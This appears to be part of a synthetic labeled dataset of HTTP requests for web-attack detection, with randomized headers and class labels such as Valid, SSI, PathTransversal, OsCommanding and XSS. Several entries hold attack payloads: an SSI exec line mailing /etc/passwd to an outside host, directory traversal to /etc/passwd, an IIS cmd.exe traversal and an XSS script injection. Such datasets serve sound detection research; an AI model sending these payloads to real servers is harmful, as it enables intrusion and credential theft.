Via: 1.7 www.eybsdaFa.html, 6.3 www.nqinflee.js:7715
Transfer-Encoding: identity
Upgrade: yseieo/2.3
Warning: 104 www.irai.tiff "s6aaiRf" 
X-Forwarded-For: 215.132.242.147
X-Serial-Number: 13347760723298878984
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30568
Start - Id: 28060
class: Valid
GET /atsepfNh.asmx?adnOrg=jTwhs%28jdwowp&mpdrojhA5aitine=8Ck60q0k&fDQXf9orSqWOa=shirrAyudonmn2lemJ&wom0oedta4=%5C4fcsefromeNs3&dmo3TboNtiaets=hD%2F&msrrvshnr=t&1JkuMiyZ_=oosbmldd%28&fdtra7eMs=8374709&8sri=6009&1nsnrOom8aig=diomn829rriROhin HTTP/1.1
Host: 84.66.15.98
Connection: close
Accept: application/*;q=0.2, video/*;q=0.7
Accept-Charset: x-mac-chinesesimp;q=0.1, us-ascii;q=0.4, x-mac-chinesesimp, utf-8
Accept-Encoding: 
Accept-Language: tea4md-tpece, rsbz-sey5daen
Cache-Control: no-transform
Client-ip: 106.176.170.46
Cookie: errdtEhfniirf=txtermse?o;cUEehhexaRlt=7SIl9G7;ilw=ip74-0aGNCuU;reu=4145992
Cookie2: $Version="63"
Date: Tue, 09 Nov 04 24:59:18 CET
ETag: W/"8jQIu9B@UcxUE_Ne"
Expect: E7eTASl
From: gu9cDaia@ar6it9.st
If-Modified-Since: Fri, 20 Feb 04 20:19:27 GMT
If-Unmodified-Since: Fri, 07 Dec 07 04:10:50 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 28 May 04 19:55:07 UTC
Max-Forwards: 881
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic dW5uYzp6b2NhRFRl
Authorization: Digest algorithm=MD5-sess
Range: -570
Referer: /fiehi.mdb
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.7 (Machintosh; U; Mac OS X 4.5; ui-se; rv:8.7.3) Gecko/18233742
UA-CPU: StrongARM
UA-Disp: 352,634,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2111x3686
Via: HTTP/6.5 11.194.20.107:41361, mer/3.7 www.aeOi7o.js:564, HTTP/9.6 248.75.77.91
Transfer-Encoding: identity
Upgrade: mt50n/6.1, frlaru/6.7
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 140.27.28.161
X-Serial-Number: 981815102258
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28060
Start - Id: 14654
class: Valid
GET /4tymctt.gif? HTTP/1.0
Host: 130.59.112.42
Connection: keep-alive
Accept: video/*;q=0.8, text/*
Accept-Charset: windows-1258, iso-2022-jp;q=0.3, cp-936
Accept-Encoding: 
Accept-Language: aio-u;q=0.7, niEtkT-l2rc;q=0.2, 02snoei-ueiae;q=0.6, qSeehto-hOaiert
Cache-Control: no-store
Client-ip: 8.162.62.163
Cookie: wweauhmeinet=niA0de;YUExwZyetc_=mtr;3drgtdepBnraDof=child4hrdeoevsTd;hsmric=i8O
Cookie2: $Version="8"
Date: Fri, 30 May 08 13:56:59 UTC
ETag: W/"2mrgmkpjbne3bbS5@MXn"
Expect: dejnL
From: ew4dDBs@eoeatshefo.uk
If-Modified-Since: Thu, 22 Nov 07 02:29:07 CET
If-Unmodified-Since: Sun, 29 Apr 07 01:27:40 CET
If-Match: "qglIcWWZnxiYVxD1D"
If-None-Match: "rHNu-VOQUxzUTDm_D"
If-Range: Fri, 23 Nov 07 22:01:55 GMT
Max-Forwards: 59
MIME-Version: 5.9
Pragma: noedt=8
Proxy-Authorization: ijwut osgnals=mtekhgsY
Authorization: Basic bXJvOGg1YzpydGhuaQ==
Range: 065-,368-,-063233
Referer: /didm/fiTe/deHd.jpeg
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.6 (Windows; U; Windows NT 6.6; zj-wh; rv:3.1.3) Gecko/74484891
UA-CPU: StrongARM
UA-Disp: 1652,237,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 557x7129
Via: 6.1 www.Hmitn.gif:21, 2.9 105.20.125.24:8696, FTP/3.9 35.184.214.165
Transfer-Encoding: identity
Upgrade: sep9n/1.9, toxe/6.1, lpmu/3.8, a8iA/5.8, gtttil/4.9
Warning: 513 www.oi02wq.gif "tu7S" "Mon, 16 May 05 01:52:04 CET"
X-Forwarded-For: 243.163.162.130
X-Serial-Number: 8994471489
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14654
Start - Id: 8297
class: Valid
GET /0ei9hmTilZs/Vteuuuoxespwhnti/8sw.vnbQnaWnyWcj/rE5eWuwbKcmV3UbnVc/ifIQ5qX2Zfm6BshjM@-/i1neuaX2fetmuvsr9uOr/shqdeabeiNax2oC/ne7r/oYnZ35mIhX.mdb?Endeeo6ese=3&ptpsyeiot=aJHzdvKy9JSa&AK7B8=i83aeL&ilve=g5+Hn%5DsTyrf%2B3uniony&xitouza=3635 HTTP/1.0
Host: 153.104.179.43
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-9;q=0.1, gb2312;q=0.2, iso-8859-3, x-mac-arabic;q=0.0
Accept-Encoding: identity;q=0.2, gzip;q=0.2
Accept-Language: eotc77iL-nenwrl, Suhoj-e6cc, hl8Sc-jsedv
Cache-Control: no-store
Client-ip: 165.218.247.238
Cookie: twas4Newster3=5076;b3etbgqnsir7=vbscriptar;swPuyiesmdnni=5022529
Cookie2: $Version="8"
Date: Sat, 15 May 04 11:47:00 UTC
ETag: "SF6ntt3pM9U3EuHN@Oj"
Expect: 100-continue
From: kNhs@ieho0.ch
If-Modified-Since: Mon, 15 May 06 04:05:03 UTC
If-Unmodified-Since: Sat, 24 Jun 06 20:03:57 UTC
If-Match: "IbFtWl6Yf_PD3rI02-"
If-None-Match: *
If-Range: *
Max-Forwards: 0195
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: trs2s egtnk=bijm
Authorization: Digest nonce
Range: 9-,-1,846-
Referer: http://fsaihdn.fr/tsHueens.asp
TE: trailers,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (Windows; U; Win98 2.0; ce-sf; rv:4.6.0) Gecko/49385662
UA-CPU: x86
UA-Disp: 9881,382,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 138x587
Via: 2.0 www.6Utiw.htm
Transfer-Encoding: omit
Upgrade: n83/8.7, wpeioz/2.0, Rbtic5/8.3, s4h/9.8
Warning: 166 128.16.194.221 "tetd7downhmnsrzsiWo" 
X-Forwarded-For: 9.228.133.238
X-Serial-Number: 02984
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8297
Start - Id: 29598
class: Valid
GET /tm8tdoGlno9/dthaRsiblzpe4p/aSvo0WE5zHiG2DQ2hd/ntdqlmgtecirdn/O58p9d77rmc/eacSfbMs/ofXpNgy7VykP/es_EWqrBGtCqO_8XUm.cfm? HTTP/1.0
Host: www.ekrR5hr.net
Connection: omnbl
Accept: */*
Accept-Charset: x-mac-arabic;q=0.0, euc-kr, x-mac-chinesetrad;q=0.1, iso-8859-3;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=2
Client-ip: 8.216.164.50
Cookie: oSIjytt8s2slbI4=130;tLIt6sry=vm0x 7nxx
Cookie2: $Version="8"
Date: Fri, 23 Jun 06 07:49:48 UTC
ETag: "L1FbUYuH@RPyinify"
Expect: pncn=tn5l
From: hk595Mi@tgQyreiAr.cz
If-Modified-Since: Sat, 30 Dec 06 17:05:25 CET
If-Unmodified-Since: Thu, 29 Jun 06 10:13:00 CET
If-Match: "eWAhDaEn3JwpD1QPJu"
If-None-Match: *
If-Range: Fri, 22 Jul 05 23:31:39 UTC
Max-Forwards: 1
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: rrTV htn2fsu=ieee
Authorization: Basic U25UaTpDMHJzZHR0
Range: -074,-900485
Referer: http://eactm.cz/vlgEdjl/oiwrsmnn/a9Helt1.jpeg
TE: trailers,gzip,trailers
Trailer: Upgrade
User-Agent: Mozilla/2.4 (compatible; Konqueror/6.8; Solaris; dhqert; 2e1stn)
UA-CPU: StrongARM
UA-Disp: 872,513,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3909x9569
Via: 9.1 www.rem7msst.jpg:0908, nad1nT/0.2 176.24.99.202, FTP/6.9 183.237.233.193
Transfer-Encoding: l3br; ednbtony=srnsd
Upgrade: ie4rh/9.4, tantge/2.0, sthf/2.0, feanh/9.5, yiHIit/4.5
Warning: 552 www.eghciu.html "MEdi" "Thu, 09 Jun 05 12:22:53 GMT"
X-Forwarded-For: 41.83.226.161
X-Serial-Number: 755614
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29598
Start - Id: 40161
class: SSI
GET /0kFhzsvaccess_logk/tZhxq5e3kt2/toUI/ryJoU.jpeg?w6-@5Zpasswdallk0=deo4evnmtnicot&roemebsutfsrdh=enhqichnhlftpmaNooee&foopg=etaes&ets34uj=%3C%21--+++%23exec+cmd%3D%22%2Fbin%2Fmail++++jf.com+++++%3C++%2Fetc%2Fpasswd%22--%3E&CcuiirtY=5027477&snz=4&MNqgd.f=%26c+GimgBf HTTP/1.1
Host: 133.78.102.146
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987, x-mac-japanese, x-mac-turkish;q=0.8, windows-874;q=0.9, x-mac-cyrillic;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 12.182.155.135
Cookie: mznOmtiec2e=oqiuj d sfshutdown]ni;cm9oI=fg4nDtnah0e
Cookie2: $Version="09"
Date: Tue, 11 Nov 08 10:43:42 GMT
ETag: W/"jd5910xRTiaSO.mE"
Expect: btdt
From: stce@ygsk.st
If-Modified-Since: Mon, 23 Feb 09 15:22:16 UTC
If-Unmodified-Since: Mon, 12 Jan 09 09:27:46 CET
If-Match: "1cu-DfxpvmDwuPd8fOmp"
If-None-Match: "v@5CpcVraVUETDDQNvI"
If-Range: Sat, 26 Jul 08 09:39:19 GMT
Max-Forwards: 122
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: ytbe8 eo2t=gnnhede
Range: 728-,7-688430
Referer: /ffroow5p/yBusth.mspx
TE: trailers
Trailer: Warning
User-Agent: Mozilla/0.0 (X11; U; Open BSD i386 4.8; fc-sn; rv:4.6.0) Gecko/57191928
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: 0.0 20.23.193.181
Transfer-Encoding: compress
Upgrade: w70e/2.8, naoa/9.2, ror/0.7
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 73.204.141.133
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40161
Start - Id: 22620
class: Valid
GET /tcZYzsDIsHV5/TQYenbbgt/eTHb/xtermNJv1inph-X64/cnanmiLuf/tS@Nj0z@.d6mBfLqtlz/emT3dutta6ewLeTt/Imw2JthqslibS/eGx5dljZ.msf?satraOel=22&ajj=70&alddiznshi=9I+i&tei6ca4menhEhea=889&npr0tm=a6ttCDd&nmcgiptrlchy=asCda&agcee5DuFqaioo1=adr&oudjfrkiPhhew=8&mgtoRlattsa1=698&hocfoeiddze55uz=1&mbgstSsuaaq=1xutsantG+copywee HTTP/1.1
Host: www.3sntmaeSac.com
Connection: Jleeao
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.9
Accept-Encoding: 
Accept-Language: gketa-e8;q=0.5
Cache-Control: no-store
Client-ip: 158.13.254.69
Cookie: oetUra=7;telesa7qnqe=418
Cookie2: $Version="8"
Date: Sun, 14 Oct 07 21:12:46 CET
ETag: "0uXElzYclvSnBFey2ga"
Expect: 100-continue
From: cigho@ceitnchx.be
If-Modified-Since: Sat, 07 Jul 07 13:42:18 UTC
If-Unmodified-Since: Fri, 04 Sep 09 02:14:23 CET
If-Match: "5MOlpEkHPXY1xrcCj"
If-None-Match: "jia22OSPoaQ._qg3I"
If-Range: Sat, 18 Dec 04 19:47:13 CET
Max-Forwards: 9
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM dHNlN2Vzb2h0dGxWemtlZmVoYWVucm5jMnlzbXdhd3d3ZjBldA==
Authorization: Basic U2xuZjplcGc5Z205
Range: -43745
Referer: /hseyt/8haeuv/hwliiit.msf
TE: chunked;q=0.2,trailers
Trailer: Pragma
User-Agent: lE4r (lkEQp8; inSQjGL)
UA-CPU: Sparc
UA-Disp: 0852,741,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 353x5479
Via: ron5s/8.5 202.81.2.184, 1.0 www.rpru.jpeg
Transfer-Encoding: identity
Upgrade: atr/6.0, rel8/5.7, Taa6/8.7, mkeoa4/7.0, osqs/2.3
Warning: 281 www.inNer.css "4tJ3dtF" "Sun, 01 Nov 09 07:54:39 CET"
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 705834569346
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22620
Start - Id: 14960
class: Valid
GET /Nfin/nhCN/aThk3eitdrabf/1s1gg8shewohli/ethe/pisEcounlep6O/dmqQxE2m9wvetEb4gBos/W7/cEuKvmkctS6nt.shtml? HTTP/1.1
Host: www.hs2it.net:059
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1250;q=0.8, x-mac-chinesesimp, windows-1257;q=0.6, iso-8859-8-i;q=0.0, x-mac-chinesetrad;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale=7
Client-ip: 104.201.186.158
Cookie: Gr2IzrA=bsuTtta3s
Cookie2: $Version="60"
Date: Sat, 16 Dec 06 09:16:47 GMT
ETag: W/"0vpyOwwtsbXrvY-.vg"
Expect: 100-continue
From: eetydor@hlpn2.net
If-Modified-Since: Sun, 13 Jun 04 08:09:44 CET
If-Unmodified-Since: Wed, 29 Jul 09 11:22:03 GMT
If-Match: "9A_sLhbdpPcf9vaAX"
If-None-Match: *
If-Range: "NY9qhFaKnv00R2nRak.l"
Max-Forwards: 8
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic cmV0czpzZG51ZXRs
Authorization: gagah aeSan=ourhmo
Range: -17567
Referer: http://zeitsdta.net/tkeyqao/eEwxEin/iriothio/nfnaWm/stm3rke.exe
TE: trailers,gzip;q=0.1,gzip;q=0.6
Trailer: Via
User-Agent: eAqw6fubeot9Iim2
UA-CPU: PowerPC
UA-Disp: 2597,7674,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 8266x800
Via: FTP/5.1 www.Duv3ywbh.htm
Transfer-Encoding: identity
Upgrade: ug6bde/8.6, aewad/9.9, ltra/3.4
Warning: 436 73.117.227.57:6 "thodictf5aXh1rett" "Sun, 19 Apr 09 22:34:03 UTC"
X-Forwarded-For: 217.55.216.75
X-Serial-Number: 51313390873628125654
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14960
Start - Id: 16900
class: Valid
GET /l3ezem/nxitDtRWK@y/i6ycMLt/qezekDjnJVf/essigoreiOaonrOtai/8oaJNHzTYHVTd3/cRJ@nO/XuOyO5XinputiB/dLaFZsPiPy475.shtml?kp4KtP=7742593&openvGadminFk=8d.Q6P06XQ&4vhgpSods=l+dd+Ee&3l@A=01&ts=nbOrleab&itzEghns7u9u=uec%3AbRsOilikeEmgoat HTTP/1.0
Host: www.cttd2.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: mOaWrmre-tRecy, dm1a-ro3d;q=0.9, Trirt-s9jaf, mi8aegya-strmYni
Cache-Control: max-age=62990
Client-ip: 128.192.173.45
Cookie: lyynLSydittai=@0;tdOsih=nnetcatet;jrhbYsoeeitgstm=543;6tuaaielnssdoit=04440578;aftiioNp2occe=7848
Cookie2: $Version="259"
Date: Fri, 20 Mar 09 10:56:57 UTC
ETag: "jmQGa4xHf2Ya1mG"
Expect: hw1rt=dptPud;nhid=asmaGf
From: riThlet@hsidtis.uk
If-Modified-Since: Thu, 11 Jun 09 08:20:08 UTC
If-Unmodified-Since: Sun, 28 Dec 08 04:22:44 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1015
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: NTLM dExKZXN1MGlpb2J0YW15YXQyc2V0dXNhdGR4dGVhZWFvY3U=
Range: -3548,6-
Referer: /lr64/rniz/uesaed/m8tvlrs.php
TE: chunked;q=0.5,gzip,trailers
Trailer: Referer
User-Agent: Mozilla/6.7 (Windows; U; Windows NT 3.5; e7-oh; rv:0.0.3) Gecko/27382441
UA-CPU: StrongARM
UA-Disp: 077,285,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 124x8989
Via: 7.5 122.65.69.132, HTTP/8.5 213.226.3.164:2, 8.5 www.L6ti.shtml
Transfer-Encoding: identity
Upgrade: osu/3.4, lZote/5.0, bbZap/2.0, oA2/8.9
Warning: 961 www.El3ett.jpg "wosiueayliee1e9dNy8d" 
X-Forwarded-For: 144.164.88.102
X-Serial-Number: 81135810517
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16900
Start - Id: 5747
class: Valid
POST /dT.jpeg? HTTP/1.1
Content-Length: 143
Content-Language: 9enohe,tnobg,hB4crspr
Content-Encoding: deflate
Content-Location: /n3gIS/fTyc/unesRox.mp3
Content-MD5: ZXNyVG5ld3B0ZHBrb3R1dw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Sep 04 13:49:14 UTC
Last-Modified: Fri, 26 May 06 23:44:41 CET
Host: www.3itDioenoy.com:50
Connection: k2not
Accept: */*
Accept-Charset: windows-1253;q=0.1
Accept-Encoding: identity;q=0.0, compress;q=0.5, identity;q=0.8
Accept-Language: nbw35-nnaEgnb;q=0.0, RbObrntN-4ercnsy;q=0.1, 48uie-TtM
Cache-Control: Erf6meg='0leEsSna'
Client-ip: 212.159.160.140
Cookie: PIQ_roNjs=zfmanlcbsettiyhtu@s;e8ksieq5=xtttsDg;q0dpbetween=oa0d e%Ht|auadbetweenqe;thVIeTB@=ltutnpsa2sGbfron;mLcnmgr4mehe0=sxO4sjgC
Cookie2: $Version="054"
Date: Mon, 02 Aug 04 14:56:30 CET
ETag: W/"u7fyFpstcGsagU56J"
Expect: 100-continue
From: etrnaOet@5ilo3ttEaJ.uk
If-Modified-Since: Mon, 01 Aug 05 23:42:52 GMT
If-Unmodified-Since: Sun, 18 Mar 07 15:02:08 UTC
If-Match: "zmh2EVkslB@KNWPsQ7R"
If-None-Match: "0Ril7-y_uFwYfqg3IE"
If-Range: "SEGkA@97nHb1h2Fc-e4"
Max-Forwards: 4
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM MnBhb2FseWFpb2VhZXRyZW51dG9mb2F3V2x4dHNyc3hlaWV3b21vdWhMdGVlbmE=
Authorization: NTLM blNocmZlYWxEc2F0Q2xxbHpzZWplb3NidHR4b2J1cGh0
Range: 60663-,-9
Referer: http://nhnh.uk/ilmTraMe/5ma3blfh.jsp
TE: gzip;q=0.9,gzip,deflate
Trailer: Authorization
User-Agent: Mozilla/8.3 (Machintosh; U; PPC 0.7; tN-ea; rv:4.0.5) Gecko/26132612
UA-CPU: PowerPC
UA-Disp: 6915,168,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 2088x8163
Via: 2.0 www.eooe.png
Transfer-Encoding: deflate
Upgrade: soi/5.7, trhldd/2.6
Warning: 670 238.185.72.131 "n3kanebPoenmenoOmas" "Fri, 16 Jun 06 21:18:30 UTC"
X-Forwarded-For: 225.25.81.5
X-Serial-Number: 80497066052713336
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nctfipsnOs0ca=clf6s4qn&w682=153265&ac0mnhetmhaeeul=gehroe pciN&inye7sbssegHeg=:>Xeevbscriptetwh&vpOlhiap=eeWJp.kJm&qxai=462&Qsu3_q=72568962

End - Id: 5747
Start - Id: 46298
class: PathTransversal
GET /a0ELycbdyK6x2pEF/las/eGOPGYFNPWURZ9Dta2Yg/5bL-ec@v-T6H4Mrmfu/TstyleHs4OkX/imrhanoml/r-7@W/SB8.mhttpgnph-Q2Uk.dll?group byO7deletedQ=ahoheiixmvc&sr=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&DK-Zorul=5685310&dddodr2tftahbgo=2240&eIsesmsiyaro5=81522647&qbJvbscript=620980&Mt=dRipbodysyuaesee&xs=%5Drtohiall%3E8aqr&gR=63&tkiz5enotsl=t&BZ5v8zorIqi=hmdtnaoN&nlHs=e%40BurobjectmThs+n%3Dor&nA=dqaT03i HTTP/1.1
Host: 128.91.1.18:809
Connection: close
Accept: text/xml, video/*;q=0.6, audio/basic
Accept-Charset: iso-8859-5;q=0.7, windows-1252;q=0.3, x-mac-chinesetrad, euc-tw;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 54.146.114.194
Cookie: s8=hNauwilsGlt2aoe
Cookie2: $Version="196"
Date: Tue, 14 Nov 06 02:53:56 UTC
ETag: W/"l1XkmFGdW1ggoyh14oL"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Thu, 13 Dec 07 21:04:21 UTC
If-Unmodified-Since: Tue, 20 Dec 05 24:56:40 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 16 Mar 08 07:24:41 CET
Max-Forwards: 73
MIME-Version: 8.6
Pragma: sg9w=nGl
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: Basic aEVTRHNkd0U6YXBhamNlZA==
Range: 5-,07-2
Referer: http://dT0b.com/i6sr/cqesg.mp3
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: o83eeri
UA-CPU: 68000
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 3.7 www.yilftr.gif:2112, ait/3.7 103.159.168.69
Transfer-Encoding: gzip
Upgrade: apEzao/7.4, nrcgos/4.1, Wles/0.2, Iiw/3.3
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46298
Start - Id: 44135
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 57.74.43.157:80
Connection: mtfast
Accept: image/*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, gzip
Accept-Language: t-cr2hhg;q=0.5, owrVPeoe-HgPfme;q=0.3, ci-hsn, es-rotq0eE
Cache-Control: 1c='awee'
Client-ip: 139.133.159.204
Cookie: ildrta4scee=phphrusraoy5riyeoiur;7E;gtfepoAtve=wit<;ssa43m=E2dr;@S63Ts8W=optb;Oine_aeJEkvK3=oeadLrS
Cookie2: $Version="549"
Date: Sun, 07 Oct 07 08:19:05 GMT
ETag: W/"1NbZPG6M0jtLITPTw7L"
Expect: a4isd=lhzrab3;nfrsWe=ryefi
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Fri, 29 Jan 10 02:08:33 CET
If-Unmodified-Since: Mon, 02 Jan 06 19:23:03 CET
If-Match: "cDbyYOpWDU8CZza7j"
If-None-Match: *
If-Range: Thu, 11 Dec 08 03:15:45 UTC
Max-Forwards: 5
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: Basic eWVsZXJvN1I6b3ZybU1uZQ==
Range: 2856-325921,765830-7785,3752-597
Referer: /rged/oohohla/psatuoqo.jpeg
TE: trailers,trailers
Trailer: Upgrade
User-Agent: nSembse1
UA-CPU: PowerPC
UA-Disp: 010,645,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/0.0 www.t2actsl.png, 1.6 www.etndo.gif, 5.6 187.24.170.221
Transfer-Encoding: gzip
Upgrade: bletts/8.4, eawgt/6.8, sXn/8.3, sei0e/5.7
Warning: 051 11.28.159.211 "vuojxaosel7oelrcfSe" 
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44135
Start - Id: 7688
class: Valid
POST /r58JRrO-CM-/ye/srhiooitghiise/utAwKKWZJgGE1X0H1Q.php4? HTTP/1.1
Content-Length: 67
Content-Language: t,islhcc,eln
Content-Encoding: identity
Content-Location: /otfwe/emtirnA/jsneo/ebTa/trnblo.tar
Content-MD5: cFJkbmh0ZTlnZE9uYXpsbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Aug 08 06:01:10 CET
Last-Modified: Tue, 13 Mar 07 04:51:00 UTC
Host: 93.80.159.223
Connection: smoc
Accept: */*;q=0.8
Accept-Charset: iso-8859-4;q=0.0, windows-874;q=0.1
Accept-Encoding: compress, gzip;q=0.6, deflate;q=0.5, gzip
Accept-Language: oloea-nNnp, c-S9, h2Cssuc-2;q=0.9, oteytasc-noge;q=0.3
Cache-Control: reB1ostr='ptJwdg'
Client-ip: 223.160.63.241
Cookie: ohht5oiuri=taeIaaDoat
Cookie2: $Version="33"
Date: Thu, 29 Sep 05 13:49:03 GMT
ETag: "Yyea6Aa1SS6qTQSBPHH4"
Expect: 100-continue
From: iein@nruizurNh.it
If-Modified-Since: Sat, 27 Jan 07 05:10:00 CET
If-Unmodified-Since: Fri, 27 Jan 06 18:25:16 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 31
MIME-Version: 4.9
Pragma: o=Ate5o
Proxy-Authorization: Basic cGllYWc6eHBvbmw=
Authorization: wtfep oeett2e=oxgbe
Range: -38669,70096-,3026-60712
Referer: /4glbej/itocel/i2hKIE/nteo/po9thsih.php4
TE: deflate;q=0.6
Trailer: Cache-Control
User-Agent: Mozilla/1.7 (Windows; U; Win 9x 7.5; sh-hm; rv:7.2.1) Gecko/44273371
UA-CPU: Sparc
UA-Disp: 1607,8813,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 592x583
Via: HTTP/4.8 www.sQseuhoa.png, 1.5 90.251.151.126
Transfer-Encoding: qftfe
Upgrade: reasrf/4.1
Warning: 953 www.sgtzoeOm.png:0 "musiwDeiogabd1ld" "Fri, 16 Jan 04 11:28:31 GMT"
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 5287621951731
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

oasnnuttiesycr=hnlvre/t&1waenoWhez=iframe8namcmob&alycnuete0=3131

End - Id: 7688
Start - Id: 47638
class: XSS
GET /SK/eEzpHAritrzrEY0D9JTH/sRtR5u.png?tlpius9BnoOTn=oa%27fneconnectIhh+Yo+&eca=hounc+t&Rb75from8G=owro&n9tIhndua=aue&eoE=cdkl&teeeas8ateanO=86864356&ruaetu55Oy7=e+6&h5u=eiuennmHpaae&JAd2s=%25ihttps&Adikn5auoRoueeb=%3Cimg++src+%3D+%22livescript%3A%5Balert%28%27udd%27%29%3B%5D+%22++%3E&vfWinsAbuTnrrue=ea&aasie=3n HTTP/1.1
Host: 4.253.214.4
Connection: hwaeyth7
Accept: video/*;q=0.2
Accept-Charset: *
Accept-Encoding: identity, gzip
Accept-Language: 4m2-3vt
Cache-Control: max-stale
Client-ip: 113.72.70.216
Cookie: abumennhahueh3=ws8Holanfmafc9shme
Cookie2: $Version="84"
Date: Wed, 12 Aug 09 21:54:25 CET
ETag: W/"BIYFtHjXJp75ty5P"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Sat, 08 Nov 08 13:16:02 UTC
If-Unmodified-Since: Mon, 26 Jun 06 22:18:29 UTC
If-Match: "gjZ2BJIIgdFb-HuHC1f"
If-None-Match: *
If-Range: Fri, 05 Jan 07 06:32:39 GMT
Max-Forwards: 4403
MIME-Version: 4.2
Pragma: m=oihtnwl
Proxy-Authorization: Digest opaque="enht"
Authorization: Digest realm
Range: 51-,059585-
Referer: /qrnyo/edqcinn.exe
TE: trailers,deflate;q=0.3,trailers
Trailer: Accept-Encoding
User-Agent: E9rhbbop4/6.4.1
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3658x8516
Via: p3t/8.9 www.esne.png, 0.7 191.24.79.201, 1.3 200.85.64.252
Transfer-Encoding: gzip
Upgrade: 2yXa/4.5, u6t/3.5, bmy/7.9, lgut/6.7, rtsa/4.7
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47638
Start - Id: 45123
class: PathTransversal
